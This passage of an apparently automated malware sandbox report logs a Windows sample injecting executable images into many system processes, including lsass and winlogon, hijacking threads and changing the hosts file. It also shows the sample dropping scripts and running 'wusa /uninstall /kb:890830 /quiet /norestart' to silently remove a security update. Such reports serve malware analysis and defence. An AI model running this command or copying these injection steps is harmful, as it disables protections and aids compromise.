                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166940000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29CE0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: C350000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22399A10000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BFFC960000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FBA3250000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1D4C2220000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1F2989C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 25EEFAE0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23839DB0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 17644530000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B42C420000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BCF4530000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1B0BB950000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\PerfDll\hyperProviderSavesinto.exe base: 15C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 216D26C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 1E7C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 2D90000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\WmiPrvSE.exe base: 1B4E0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\WmiPrvSE.exe base: 13C0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 150E9040000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 267FCE60000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\PING.EXE base: 2359B4F0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\RuntimeBroker.exe base: 1BD70000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\RuntimeBroker.exe base: 1360000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: BB0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: E60000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 289066A0000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E205C10000 value starts with: 4D5A
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E2066A0000 value starts with: 4D5A
                                Injects code into the Windows Explorer (explorer.exe)
                                Source: C:\Windows\System32\dialer.exeMemory written: PID: 2580 base: C350000 value: 4D
                                Modifies the context of a thread in another process (thread injection)
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeThread register set: target process: 7964Jump to behavior
                                Modifies the hosts file
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Writes to foreign memory regions
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAF190000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B380000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\RuntimeBroker.exe base: 1300000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166940000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29CE0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: C350000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22399A10000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BFFC960000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FBA3250000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1D4C2220000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1F2989C0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 25EEFAE0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23839DB0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 17644530000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B42C420000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BCF4530000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1B0BB950000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\PerfDll\hyperProviderSavesinto.exe base: 15C0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 216D26C0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 1E7C0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 2D90000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\WmiPrvSE.exe base: 1B4E0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\WmiPrvSE.exe base: 13C0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\cmd.exe base: 150E9040000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 267FCE60000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\PING.EXE base: 2359B4F0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\RuntimeBroker.exe base: 1BD70000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Recovery\RuntimeBroker.exe base: 1360000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: BB0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: E60000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 289066A0000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E205C10000
                                Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E2066A0000
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D7ECA0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F4D7ECA0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeProcess created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe "C:\Users\user\AppData\Local\Temp\GargantuaN.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeProcess created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe "C:\Users\user\AppData\Local\Temp\GargantuanS.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\PerfDll\c2HM4VxGuBBIXOzYQncd9IeSwfaF3.vbe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PerfDll\vvkzdvmSUM14jiAzc.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\PerfDll\hyperProviderSavesinto.exe "C:\PerfDll/hyperProviderSavesinto.exe"Jump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sB1sK52ORC.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,46_2_0000000140001B54
                                Source: C:\Windows\System32\dialer.exeCode function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,46_2_0000000140001B54
                                Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                                Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                                Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                                Source: winlogon.exe, 00000031.00000000.1741644012.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000031.00000002.2885338159.00000225DCB71000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D98DB0 cpuid 0_2_00007FF7F4D98DB0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF7F4D7DE04
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: GetLocaleInfoW,GetNumberFormatW,1_2_00D6AF0F
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
